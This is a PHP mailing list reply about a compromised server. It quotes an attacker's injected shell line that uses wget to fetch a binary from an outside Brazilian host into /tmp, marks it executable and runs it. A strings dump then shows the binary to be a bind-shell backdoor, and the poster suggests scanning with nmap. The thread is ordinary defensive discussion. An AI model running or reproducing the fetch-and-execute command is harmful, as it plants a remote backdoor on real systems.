John Nichel wrote:
echo ___INICIO___;cd /tmp;wget http://www.intranorth.com.br/xpl/r0nin;chmod 777 r0nin;./r0nin;echo ___FIM___;
It also downloaded a file from a Brazilian website, and executed it in the /tmp directory...I deleted all of those, but saved one to 'play' with later.
# strings r0nin [snip] socket bind listen PsychoPhobia Backdoor is starting... [snip]
Might want to run nmap (or other equivalent program) on your system.
-- W | I haven't lost my mind; it's backed up on tape somewhere. +-------------------------------------------------------------------- Ashley M. Kirchner <mailto:ashley@xxxxxxxxxx> . 303.442.6410 x130 IT Director / SysAdmin / Websmith . 800.441.3873 x130 Photo Craft Laboratories, Inc. . 3550 Arapahoe Ave. #6 http://www.pcraft.com ..... . . . Boulder, CO 80303, U.S.A.
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
